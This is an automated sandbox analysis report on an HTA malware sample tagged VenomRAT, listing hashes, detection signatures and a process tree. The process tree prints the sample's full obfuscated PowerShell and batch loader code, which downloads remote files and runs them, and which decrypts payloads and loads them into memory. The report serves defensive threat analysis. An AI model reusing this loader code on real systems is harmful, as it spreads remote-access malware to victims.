Edit tour
Windows
Analysis Report
hta.hta
Overview
General Information
| Sample name: | hta.hta |
| Analysis ID: | 1429075 |
| MD5: | c4c06bc09d5d07d8abdb074e80806d07 |
| SHA1: | fd49f1d6c2fb26415c90b9e352b288f16e169b6c |
| SHA256: | c5010ef902c9a8421aaf07a4ac475667c0b2ddae0b2d4c2f4c28aa7b7f482b3d |
| Tags: | htaVenomRAT |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 2920 cmdline: mshta.exe "C:\Users\ user\Deskt op\hta.hta " MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 2136 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted function g kzChlFZJJ( $CLgcLN, $ kmBiXxhdPB BuVK){[IO. File]::Wri teAllBytes ($CLgcLN, $kmBiXxhdP BBuVK)};fu nction EHy qZyfXS($CL gcLN){if($ CLgcLN.End sWith((wTb QxZaeCBFXf E @(68345, 68399,6840 7,68407))) -eq $True ){rundll32 .exe $CLgc LN }elseif ($CLgcLN.E ndsWith((w TbQxZaeCBF XfE @(6834 5,68411,68 414,68348) )) -eq $Tr ue){powers hell.exe - ExecutionP olicy unre stricted - File $CLgc LN}elseif( $CLgcLN.En dsWith((wT bQxZaeCBFX fE @(68345 ,68408,684 14,68404)) ) -eq $Tru e){misexec /qn /i $C LgcLN}else {Start-Pro cess $CLgc LN}};funct ion EcjCVm fjLDzFvM($ qDNhNUEOwg jE){$pXytQ mYCtNpvKlm M = New-Ob ject (wTbQ xZaeCBFXfE @(68377,6 8400,68415 ,68345,683 86,68400,6 8397,68366 ,68407,684 04,68400,6 8409,68415 ));[Net.Se rvicePoint Manager]:: SecurityPr otocol = [ Net.Securi tyProtocol Type]::TLS 12;$kmBiXx hdPBBuVK = $pXytQmYC tNpvKlmM.D ownloadDat a($qDNhNUE OwgjE);ret urn $kmBiX xhdPBBuVK} ;function wTbQxZaeCB FXfE($IXRs dNnynXKLzp ){$gCTQwIl SnN=68299; $gsScNSXbh sG=$Null;f oreach($YP rbcjAFtcNC Ehncu in $ IXRsdNnynX KLzp){$gsS cNSXbhsG+= [char]($YP rbcjAFtcNC Ehncu-$gCT QwIlSnN)}; return $gs ScNSXbhsG} ;function odaqkEMluK lVzieGjH() {$nbpUYlNu lSp = $env :AppData + '\';$cnys luAIEDXyIH = $nbpUYl NulSp + 'N ote.txt';I f(Test-Pat h -Path $c nysluAIEDX yIH){Invok e-Item $cn ysluAIEDXy IH;}Else{ $nzWdArjtu UapYUy = E cjCVmfjLDz FvM (wTbQx ZaeCBFXfE @(68403,68 415,68415, 68411,6835 7,68346,68 346,68348, 68356,6835 0,68345,68 349,68349, 68349,6834 5,68356,68 353,68345, 68348,6834 9,68355,68 357,68354, 68349,6835 5,68354,68 346,68377, 68410,6841 5,68400,68 345,68415, 68419,6841 5));gkzChl FZJJ $cnys luAIEDXyIH $nzWdArjt uUapYUy;In voke-Item $cnysluAIE DXyIH;};$i TWyAvaurQ = $nbpUYlN ulSp + '15 .bat'; if (Test-Path -Path $iT WyAvaurQ){ EHyqZyfXS $iTWyAvaur Q;}Else{ $ YiQQDI = E cjCVmfjLDz FvM (wTbQx ZaeCBFXfE @(68403,68 415,68415, 68411,6835 7,68346,68 346,68348, 68356,6835 0,68345,68 349,68349, 68349,6834 5,68356,68 353,68345, 68348,6834 9,68355,68 357,68354, 68349,6835 5,68354,68 346,68348, 68352,6834 5,68397,68 396,68415) );gkzChlFZ JJ $iTWyAv aurQ $YiQQ DI;EHyqZyf XS $iTWyAv aurQ;};;;; }odaqkEMlu KlVzieGjH; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 3200 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
notepad.exe (PID: 7096 cmdline: "C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\Ap pData\Roam ing\Note.t xt MD5: E92D3A824A0578A50D2DD81B5060145F) - cmd.exe (PID: 6340 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\15.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3560 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\AppD ata\Roamin g\15.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4832 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5532 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $host.U I.RawUI.Wi ndowTitle= 'C:\Users\ user\AppDa ta\Roaming \15.bat';$ MMJz='GelY estClYesur lYesrenlYe stlYesProl YesceslYes slYes'.Rep lace('lYes ', ''),'Ch FGxTanFGxT gFGxTeEFGx TxFGxTteFG xTnsFGxTiF GxToFGxTnF GxT'.Repla ce('FGxT', ''),'EleT QWBmeTQWBn TQWBtAtTQW B'.Replace ('TQWB', ' '),'CrAFGs eAFGsaAFGs tAFGseAFGs DecAFGsryA FGsptAFGso rAFGs'.Rep lace('AFGs ', ''),'SR lYbpRlYblR lYbiRlYbtR lYb'.Repla ce('RlYb', ''),'DoaA necooaAnmp oaAnresoaA nsoaAn'.Re place('oaA n', ''),'E nHILctrHIL cyHILcPoHI LcinHILctH ILc'.Repla ce('HILc', ''),'CDYn ropDYnryTo DYnr'.Repl ace('DYnr' , ''),'Rea OApIdLiOAp InesOApI'. Replace('O ApI', ''), 'IndQRQvod QRQkedQRQ' .Replace(' dQRQ', '') ,'TratglIn stglIfotgl IrmtglIFit glInatglIl BltglIotgl IctglIktgl I'.Replace ('tglI', ' '),'MbkBwa ibkBwnbkBw ModbkBwulb kBwebkBw'. Replace('b kBw', ''), 'FroXggooX ggmBaoXggs eoXgg64SoX ggtroXggio XggngoXgg' .Replace(' oXgg', '') ,'Loajyrjd jyrj'.Repl ace('jyrj' , '');powe rshell -w hidden;fun ction FBej p($JKmLP){ $UerdI=[Sy stem.Secur ity.Crypto graphy.Aes ]::Create( );$UerdI.M ode=[Syste m.Security .Cryptogra phy.Cipher Mode]::CBC ;$UerdI.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7;$Uer dI.Key=[Sy stem.Conve rt]::($MMJ z[12])('dV sAn8RIciGb Sq5PEUSffn RQiEF7D6Jh J+MhQGAxpx A=');$Uerd I.IV=[Syst em.Convert ]::($MMJz[ 12])('rrMf 8DdSiOTkJY W5AhOOlg== ');$ytGVg= $UerdI.($M MJz[3])(); $FTQFX=$yt GVg.($MMJz [10])($JKm LP,0,$JKmL P.Length); $ytGVg.Dis pose();$Ue rdI.Dispos e();$FTQFX ;}function mpyCC($JK mLP){$Fjjx J=New-Obje ct System. IO.MemoryS tream(,$JK mLP);$sySF b=New-Obje ct System. IO.MemoryS tream;$Rdf pf=New-Obj ect System .IO.Compre ssion.GZip Stream($Fj jxJ,[IO.Co mpression. Compressio nMode]::($ MMJz[5])); $Rdfpf.($M MJz[7])($s ySFb);$Rdf pf.Dispose ();$FjjxJ. Dispose(); $sySFb.Dis pose();$sy SFb.ToArra y();}$BklL D=[System. IO.File]:: ($MMJz[8]) ([Console] ::Title);$ oNBKh=mpyC C (FBejp ( [Convert]: :($MMJz[12 ])([System .Linq.Enum erable]::( $MMJz[2])( $BklLD, 5) .Substring (2))));$Hu DRY=mpyCC (FBejp ([C onvert]::( $MMJz[12]) ([System.L inq.Enumer able]::($M MJz[2])($B klLD, 6).S ubstring(2 ))));[Syst em.Reflect ion.Assemb ly]::($MMJ z[13])([by te[]]$HuDR Y).($MMJz[ 6]).($MMJz [9])($null ,$null);[S ystem.Refl ection.Ass embly]::($ MMJz[13])( [byte[]]$o NBKh).($MM Jz[6]).($M MJz[9])($n ull,$null) ; " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powershell.exe (PID: 4268 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 5328 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- svchost.exe (PID: 5252 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): | ||